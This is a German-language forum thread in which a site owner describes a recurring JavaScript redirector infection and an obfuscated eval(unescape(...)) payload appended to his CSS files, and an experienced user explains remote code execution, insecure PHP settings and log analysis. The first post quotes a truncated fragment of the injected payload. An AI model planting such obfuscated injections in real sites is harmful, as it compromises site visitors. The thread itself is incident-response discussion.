Gehackt (nicht phpBB)

[maxl]

Hi Leute und Spezialisten!

Ich möchte euch mal ein Problem mit meiner gehackten Homepage (keine Sorge, ist ist kein phpBB!) schildern, weil ich gerne verstehen möchte wie sowas funktioniert bzw. vielleicht hätte verhindert werden können! Mir ist natürlich klar, daß ihr mir nicht bei der genauen Lösung helfen könnt, aber vielleicht bringt ihr mir ja ein wenig Licht ins Dunkle?

Also, ich hatte auf meinem Webspace 3 verschiedene Systeme laufen und zwar 1 CMS, 1 Shop und einen Anzeigenmarkt - alles drei von unterschiedlichen Herstellern und für jedes System eine eigene MySQL-Datenbank und alle Datenbanken mit eigenen Passwörtern.

Plötzlich bekam ich bei jedem Aufruf einer der Seiten eine Viruswarnung und zwar "Trojan.JS.Redirector.e" der sich offenbar über eine "check.js" eingeschlichen hat.

So, nun habe ich natürlich meinen Webspace nach diesem "check.js" durchsucht und dann auch gefunden und zwar in einem harmlos erscheinenden Ordner, den ich selbst irgendwann mal angelegt, aber dann nicht mehr gebraucht habe. Gut, denke ich mir und habe den Ordner gelöscht und das FTP-Passwort geändert, aber denkste, schon bald war das Ding wieder da!

Dann habe ich freilich ein "verdächtiges" System nach dem anderen samt Datenbank gelöscht bis nur noch eines über geblieben ist und trotzdem kommt der schei... Trojaner wieder! Klar, dann natürlich auch noch das letzte System gelöscht und nun ist freilich Ruhe.

Nur mir hat das klarerweise keine Ruhe gelassen, habe weitergesucht und siehe da, in sämtlichen css-Dateien (bei allen 3 Systemen) hat sich gut versteckt am Ende so ein Mist wie dieser eingenistet:

Code: Alles auswählen

expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65 %74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20% .................(den Rest hab ich weggelassen)

O.K., wenn jetzt ein System eine Lücke hat und ein solcher Angriff (habe was gelesen, daß dies eine XSS-Lücke sein könnte) stattgefunden hat, warum sind dann gleich alle Systeme betroffen?

Wie gesagt, ich möchte es nur irgendwie verstehen - läuft das über irgendein "automatisches" Skript, oder hat da jemand selbst Hand angelegt?

Wäre super, wenn mir irgendwer von euch das halbwegs verständlich erklären könnte und vielleicht sogar einen Tipp für mich hat, wie ich sowas künftig verhindern kann!

Vielen Dank schon mal!

lg maxl

[larsneo]

das ganze wird wahrscheinlich auf einer remote code execution basieren - damit wird dann eine shell eingebunden über die lokale dateien auf dem server geändert werden können. all das zusammen setzt aber neben einer entsprechenden sicherheitslücke in einer der installierten applikationen auch eine schlechte serverkonfiguration voraus (ggfs. register_globals, allow_url_include etc.) - phpsecinfo kann dir (bzw. deinem provider) helfen, die sicherheit zu optimieren (die grundlegende sicherheitslücke gilt es natürlich auch noch zu finden, hier sind die logs des servers dein freund und helfer)

[maxl]

Hallo larsneo!

Danke schon mal für deine Antwort! Irgendwie habe ich ja gehofft, daß du mir auf das Problem antworten wirst, da du ja zu denen gehörst, die wirklich Ahnung von der Materie haben. Andererseits habe ich es aber auch befürchtet, da ich von dem was du mir antwortest nicht wirklich was verstehe! Bin halt leider schon ein alter Depp!

Vielleicht hast du aber noch eine Antwort für mich parat und zwar, ob es sich eher um ein automatisches Skript handeln wird oder ob das möglicherweise ein gezielter Angriff per Hand war - also was von beiden eher Wahrscheinlich sein würde?

Die Logfiles - ja die habe ich natürlich, aber "nur" die access.log und error.log. Von den FTP-Logs habe ich vom Provider leider nur jene der letzten Tage bekommen, als ich die Systeme bereits vom Webspace gelöscht habe - die bringen mir also leider nichts! Ist ein Provider nicht eigentlich verpflichtet die Files über einen längeren Zeitraum aufzubewahren?

lg maxl

[larsneo]

ob es sich eher um ein automatisches Skript handeln wird oder ob das möglicherweise ein gezielter Angriff per Hand war

in aller regel wird automatisiert nach schwachstellen gesucht und das script meldet dem angreifer dann potentiell unsichere seiten - dann kann über die o.a. remote code execution manuell nachgearbeitet werden (in deinem fall z.b. das editieren der css-dateien).

Die Logfiles - ja die habe ich natürlich, aber "nur" die access.log und error.log.

in aller regel reichen die access-logs aus dem zeitbereich des angriffs. das angriffsmuster dort zu finden ist allerdings nicht ganz einfach - oftmals wird die shell über eine entfernte .txt datei eingebunden, schwachstellen können aber natürlich auch ganz anders ausgenutzt werden...

[maxl]

in aller regel wird automatisiert nach schwachstellen gesucht und das script meldet dem angreifer dann potentiell unsichere seiten - dann kann über die o.a. remote code execution manuell nachgearbeitet werden (in deinem fall z.b. das editieren der css-dateien).

Hmm, also wenn ich das richtig verstanden habe, dann hat wahrscheinlich wer mittels Script nach einer Schwachstelle gesucht, bei mir gefunden und dann per Hand manipuliert. Was ich aber nicht verstehe, warum sind dann alle 3 Systeme betroffen? Ich meine, wenn der Schwachpunkt z.B. das CMS war, warum sind dann der Shop und der Anzeigenmarkt auch betroffen?

Wie muß ich mir die Manipulation vorstellen - ladet dieser Jemand die css-Dateien per FTP runter, schreibt seinen Mist da rein und ladet sie dann wieder hoch? Und wie sieht es dann mit den Datenbanken aus - muß ich damit rechnen, daß auch diese manipuliert wurden und sollte ich sie besser nicht mehr verwenden, weil der Zirkus dann von vorne wieder losgeht?

Gibt es solche automatischen Scripts nicht auch für den guten Zweck - also um damit z.B. meine eigenen Systeme auf Sicherheit prüfen zu können?

in aller regel reichen die access-logs aus dem zeitbereich des angriffs. das angriffsmuster dort zu finden ist allerdings nicht ganz einfach - oftmals wird die shell über eine entfernte .txt datei eingebunden, schwachstellen können aber natürlich auch ganz anders ausgenutzt werden...

Die access-logs habe ich bereits einen Kriminalisten zur Auswertung gegeben - mal sehen, ob's was bringt.

Danke nochmal für deine Antworten und Sorry für meine laienhaften Fragen, aber wie gesagt, das Alter...

lg maxl

[larsneo]

Ich meine, wenn der Schwachpunkt z.B. das CMS war, warum sind dann der Shop und der Anzeigenmarkt auch betroffen?

wenn es die serverkonfiguration zulässt kann man vereinfacht gesagt über die bereits angesprochene remote code injection eine art editor nachladen über den man dann die dateien auf dem server bearbeiten kann - auch ordnerübergreifend.

Gibt es solche automatischen Scripts nicht auch für den guten Zweck - also um damit z.B. meine eigenen Systeme auf Sicherheit prüfen zu können?

das bereits verlinkte phpsecinfo kann zumindestens helfen potentielle schwachstellen auf der serverseite zu finden - die dann abzustellen ist aber leider oftmals sache des providers...

Die access-logs habe ich bereits einen Kriminalisten zur Auswertung gegeben - mal sehen, ob's was bringt.

wenn's nicht megabyte an daten sind (und auf den zeitraum des angriffs eingedampft wurden) kannst du sie mir gerne mal eintüten und zuschicken - mein kleines horrorkabinett an exploits freut sich immer über neuzugänge...

[maxl]

wenn's nicht megabyte an daten sind (und auf den zeitraum des angriffs eingedampft wurden) kannst du sie mir gerne mal eintüten und zuschicken - mein kleines horrorkabinett an exploits freut sich immer über neuzugänge...

Hallo larsneo!

Mensch, das würdest du dir echt mal ansehen?

Ich habe die access.log von zumindest einen Tag mal vorliegen und die hat gerade mal 828 KB - wenn ich sie dir zuschicken darf würde ich mich freuen, wenn du mir per PN deine Mailadresse schickst!

Herzlichen Dank schon mal!!!

lg maxl